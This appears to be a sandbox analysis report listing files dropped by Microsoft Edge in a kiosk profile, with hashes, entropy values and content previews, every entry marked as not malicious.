SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF35bcd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF35dd1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF35e1f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF3850f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF3c95c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF46e75.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF4a6fa.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF4ce1a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Local State~RF5b899.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	5.558802140696943
Encrypted:	false
SSDEEP:	24:YpQBqDPak7u5rrttv1FYyikNJdXBuBuwB0am+gNhpVHUXTdpQQRCYfYg:YuBqDPaf/v1F+UgBzB07+ipVHUjIB0
MD5:	895AA27F5AB7F3A12CD0CBC1576E496E
SHA1:	F0B5317C1124D2C9DD91D76FA0C4185CCC6D044E
SHA-256:	6AF6B711F82462682141AB5060468FBEBF00683E37C744B66ED6B8D2ABFC552C
SHA-512:	9FA00D2774FCB698B906C2C4B0DB2F3EFC16972C6677CCF42668EB52931B19835892D7CF5A710F3069F2FD386FDBEF080969B8C5389D7FA30F571633B5D9EE27
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"profile":{"info_cache":{},"profile_counts_reported":"13369638492197595","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1725164891"},"user_experienc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.46731661083066856
Encrypted:	false
SSDEEP:	12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
MD5:	E93ACF0820CA08E5A5D2D159729F70E3
SHA1:	2C1A4D4924B9AEC1A796F108607404B000877C5D
SHA-256:	F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
SHA-512:	3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ShaderCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ShaderCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ShaderCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\ShaderCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.47693366977411E-4
Encrypted:	false
SSDEEP:	3:LsNlJ+s4aKll:Ls3Z4T
MD5:	E92EABDD44FD9D94A908A1FAE14F1C70
SHA1:	84D631E975B979FB95C7F1CF0625F9C902A4D7F9
SHA-256:	534092634AC96543ACB87582332486259C42C5A93F850A917ABE3350E16D8D9E
SHA-512:	85BF593C4CF92E8EA659CA152795FE2B2CB72DB606655E4CD79A2B0FD9A788B4E85546246980F3A5FE145CEECD2EC23E9DEBB63C9A4D3E95C53DB3F97679665F
Malicious:	false
Preview:	.........................................q..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
